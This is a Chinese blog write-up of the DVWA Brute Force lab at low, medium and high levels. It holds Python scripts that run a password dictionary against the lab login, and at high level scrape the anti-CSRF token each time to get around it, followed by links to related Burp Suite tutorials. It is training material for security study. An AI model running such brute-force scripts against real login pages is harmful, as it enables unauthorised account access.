DVWA - Brute Force (low, medium, high)

最新推荐文章于 2024-05-09 10:15:34 发布
最新推荐文章于 2024-05-09 10:15:34 发布
阅读量1.6k 收藏 2
点赞数 1
分类专栏: CTF 文章标签: security
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SCNU_Jiechao/article/details/54098603
版权

low

遍历字典(成功的前提是字典里有这个密码)

import requests
import re


def main():
    url = 'http://192.168.67.22/dvwa/vulnerabilities/brute/index.php'
    headers = {
        'Cookie': 'PHPSESSID=h6r8555q2obvo388r4u50lg397; security=low'
    }
    h = open('pwd.txt')
    line = h.readline()
    while line:
        password = line.strip()
        new_url = url + '?username=admin&password=' + password + '&Login=Login'
        res = requests.get(new_url, headers=headers)
        if 'Username and/or password incorrect.' in res.content:
            print('Test %s: No' % password)
        else:
            print('Test %s: Yes' % password)
            break
        line = h.readline()


if __name__ == '__main__':
    main()

结果

Test 123456: No
Test admin: No
Test password: Yes
[Finished in 0.3s]

medium

查看源码发现

sleep( 2 );

测试不成功时会延时2s,方法和low一样,只是慢一些,需要更新cookie中的安全等级security。

headers = {
    'Cookie': 'PHPSESSID=h6r8555q2obvo388r4u50lg397; security=medium'
}

high

查看源码发现

<input type="hidden" name="user_token" value="2fe55c6b0091776e6f46283d41854b41">
// Check Anti-CSRF token 
checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

多一个字段,测试后可发现user_token字段的值是动态的,思路即是在代码层面动态获该字段的值,再发测试密码的请求。

import requests
import re


def main():
    url = 'http://192.168.67.22/dvwa/vulnerabilities/brute/index.php'
    headers = {
        'Cookie': 'PHPSESSID=h6r8555q2obvo388r4u50lg397; security=high'
    }
    h = open('pwd.txt')
    line = h.readline()
    while line:
        password = line.strip()
        res = requests.get(url, headers=headers)
        m = re.search(r"user_token' value='(.*?)'", res.content, re.M | re.S)
        if m:
            user_token = m.group(1)
        new_url = url + '?username=admin&password=' + password + '&user_token=' + user_token + '&Login=Login'
        res = requests.get(new_url, headers=headers)
        if 'Username and/or password incorrect.' in res.content:
            print('Test %s: No' % password)
        else:
            print('Test %s: Yes' % password)
            break
        line = h.readline()


if __name__ == '__main__':
    main()
jchalex
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA - Brute Force (high)
qq_42630215的博客
06-04 404
high级别 (使用burp suite进行暴力破解) 将登录请求进行拦截,发现增加了user_token参数,使用了随机token机制来防止CSRF,防止了重放攻击,增加了爆破难度。但是依然可以使用burpsuite来爆破。 1.先将请求发送到intruder。 2. 设置两个参数 password和user_token为变量,攻击类型选择pitchfork,它可以使用多组Payload集合,在每一个不同的Payload标志位置上(最多20个),遍历所有的Payload。举例来说,如果有两个Payloa
DVWA暴力破解(Brute_Force High级别)
liweibin812的博客
01-11 1万+
DVWA调至high级别,发现用之前的暴力破解就不好使了,因为其使用了随机token机制来防止CSRF,从而在一定程度上防止了重放攻击,增加了爆破难度。但是依然可以使用burpsuite来爆破。 1. 将登录请求进行拦截,发现增加了user_token参数,所以爆破要选择两个参数来进行,先将请求发送到intruder。 2. 设置两个参数 password和user_token为变量,攻...
DVWA靶机-暴力破解(Brute Force)
weixin_43726831的博客
10-11 2815
DVWA靶机-暴力破解 1.DVWA靶机的4个安全等级 DVWA Security分为四个等级,low,medium,high,impossible,不同的安全等级对应了不同的漏洞等级。 1.low-最低安全等级,无任何安全措施,通过简单毫无安全性的编码展示了安全漏洞。 2.medium-中等安全等级,有安全措施的保护,但是安全性并不强。 3.high-高等安全等级,有安全措施保护,是中等安全等级...
DVWA靶场-Brute Force暴力破解~保姆级教程!!!
2301_77360738的博客
05-09 2542
DVWA靶场初体验,超简单的暴力破解!!!
DVWA笔记之一:brute Force
weixin_30550271的博客
08-11 118
1.Low 级别 burpsuite抓包 low级别是使用GET请求进行登录,将其发送到Intruder中,并增加password变量 之后选择字典开始攻击。 暴力破解完成后,查看结果RESULT,根据Content-Length来判断登陆是否成功。 2.MEDIUM级别 有效抵制了sql注入,但是并未有对爆破破解做有抵御措施,因此爆破方法与上述类似,只是这里增加了一个...
DVWA 靶场之 Brute Force-High(token检测)
Welcome To Myon'Blog !
02-23 1027
说明每次都会对 token 进行校验,并且 token 是变化的、随机的(你只需要重新抓包就会发现)可以看到,出来的 user_token 正是我们请求题目页面时回显响应的 user_token 值。这里的 token 需要与每次的密码一一对应,因此我们使用音叉(Pitchfork)说明我们的 user_token 检验通过,没有问题。接下来我们尝试找一下 user_token 的来源。可以看到每次请求不同的密码都对应了不同的token。至此,我们找到了 user_token 的来源。
DVWA】11. Brute Force暴力破解(High+Impossible)
Zichel77的博客
12-14 1194
在代码中,使用 prepare 方法准备 SQL 语句,并使用 bindParam 方法绑定参数,确保输入的用户名和密码在查询中被正确地转义和处理。mysqli_real_escape_string(string,connection)函数会对字符串string中的特殊符号(\x00,\n,\r,\,‘,“,\x1a)进行转义。延时反应:在登录失败的情况下,代码通过 sleep 函数来引入一个随机的延迟时间(2 到 4 秒之间),这样可以防止暴力破解者通过快速尝试大量不同的用户名和密码组合。
DVWA-Brute Force @ Burpsuite.docx
06-27
DVWA-Brute Force @ Burpsuite.docx
DVWA-master.zip
01-04
DVWA-master.zip文件包含了整个DVWA项目的源代码和相关资源,是学习和研究网络安全的理想工具。 1. **DVWA的结构与功能** DVWA由多个安全级别组成,包括“低”、“中”、“高”和“不可能”,每个级别都包含不同...
DVWA-master.7z 压缩包
09-14
这个"DVWA-master.7z"压缩包包含了完整的DVWA源代码和其他相关文件,用于在本地环境中搭建一个模拟的脆弱Web应用。 为了正确地使用这个压缩包,首先你需要下载它并使用解压缩工具(如7-Zip)将其解压。解压缩后,你...
DVWA 爆破 HIGH
m0_46315342的博客
07-10 510
high模式下多了一个token,token放在隐藏input的value中,如果再用low模式的爆破方法就不行了,因为token是变化的,这个时候需要绕过token。 直接推荐一个博客把:DVWA 爆破 HIGH 这个博客前面几行还有个low级别的,不过high级别的讲的很清楚。 有一个要注意的地方:抓完包之后不要把poxy里面的intercept给关了,不然在设置token的时候会出错。 ...
DVWA——Brute force(low)
分享简单的安全技术
01-04 541
Brute force——暴力破解 界面: 源代码: <?php if(isset($_GET['Login'])){ //Getusername $user=$_GET['username']; //Getpassword $pass=$_GET['password']; $pass=md5($pass); //Checkthedatabase $query="SELECT*FROM`users`WHEREuser='$user'ANDpassword='$pass';"; $result=
Brute Force high
weixin_52864820的博客
05-18 147
发现一个不用写脚本单纯用burp suite破解high级别的Brute Force,记录一下 Brute Force high 抓包 对比之前的medium抓到的包get里多了user_token这个值,这个值是随机的每次都不一样,有点像网页发的验证码,验证身份。 将抓到的包发送到intruder模块,将密码和token值设为变量,同时改变攻击模式,选择pitchfork。 pitchfork 草叉模式,我的理解是两个变量为一对,来破解密码,解决了token值每次都会变化的情况。 接下来解决token
DVWA——high等级Brute Force通关
weixin_51220765的博客
12-23 353
DVWA——high等级Brute Force通关 登录dvwa,选择high模式进行练习 来到Brute Force,首先输入username,password进行测试,查看输出情况 打开BP进行拦包,把拦到的包发送到Intruder模块,设置两个爆破参数(1、密码参数 2、token值参数)选择第三种爆破模式Pitchfork 这时我们清除默认被标记的,然后给我想要获取的信息添加标记 选择Pichfork(草叉模式)因为它是多参数同时爆破,但用的是不同的字典 在Payload Sets里的
【工具-DVWADVWA渗透系列一:Brute Force
qqchaozai的专栏
10-17 5473
前言 DVWA安装使用介绍,见:【工具-DVWADVWA的安装和使用 本渗透系列包含最新DVWA的14个渗透测试样例: 1.Brute Force(暴力破解)2.Command Injection(命令注入)3.CSRF(跨站请求伪造)4.File Inclusion(文件包含)5.File Uploa...
DVWA靶场第一关Brute Forcelow级)
weixin_61178511的博客
01-29 1184
准备工作:1.首先我们要进行靶场的搭建 2. 还有一些要用到的工具的安装 3.在浏览器安装代理插件 4.以及打开电脑代理 地址和端口是我相应127.0.0.1和8080 准备工作完毕之后 开始登录,初始账号密码分别为admin和password。 进入后我们先点击DVWA Security将难度调为low级 接下来随便输入账号密码,并打开浏览器的代理,打开Brup Suite的拦截,开始抓包 Raw中弹出如上页面代表抓包成功,我们点击行动将其发送给Intrude...
DVWA(1)暴力破解(Brute Force) LOW-HIGHT 操作记录
lllllaaa111的博客
10-20 1330
初次接触DVWA,写下自己的操作记录,希望可以帮助每个刚接触DVWA的新手,同时希望可以提升自己的技术。注:如有操作不当的地方希望可以得到大神指导、交流。
DVWA 之暴力破解攻击(Brute Force
热门推荐
弱弱的小雨鸟
01-14 1万+
暴力破解(Brute Force)的意思是攻击者借助计算机的高速计算不停枚举所有可能的用户名和密码,直到尝试出正确的组合,成功登录系统。理论上,只要字典足够大,破解总是会成功的。阻止暴力破解的最有效方式是设置复杂的密码(英文字母大小写、数字、符号混合)。而如果你的字典是从某网站泄露出来的,你使用它试图登陆其他网站,就便是撞库。撞库攻击的成功率高于暴力破解,因为你在A网站的用户名、密码通常和B网站的
DVWA Brute Force漏洞利用(Security Level : high)
zwlww1的博客
02-25 1041
由于加入了Anti-CSRFtoken预防无脑爆破,这里就不推荐用Burpsuite了,还是简单用python写个脚本吧。借用lonehand脚本(python 2.7),用户名为admin,对password参数进行爆破并打印结果,但因为版本问题,获取user_token时需要做出相应调整。调整结果如下:(在原基础上修改了TOKEN获取方式,增加了用户名猜解)from bs4 import Be...
dvwa通关brute force
最新发布
06-08
DVWA中,Brute Force挑战是关于用户登录部分的一个环节,主要是测试用户的密码暴力破解能力。 当你遇到Brute Force关卡时,目标是尝试使用各种可能的用户名和密码组合,直到找到正确的登录凭证。这通常涉及到编写...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值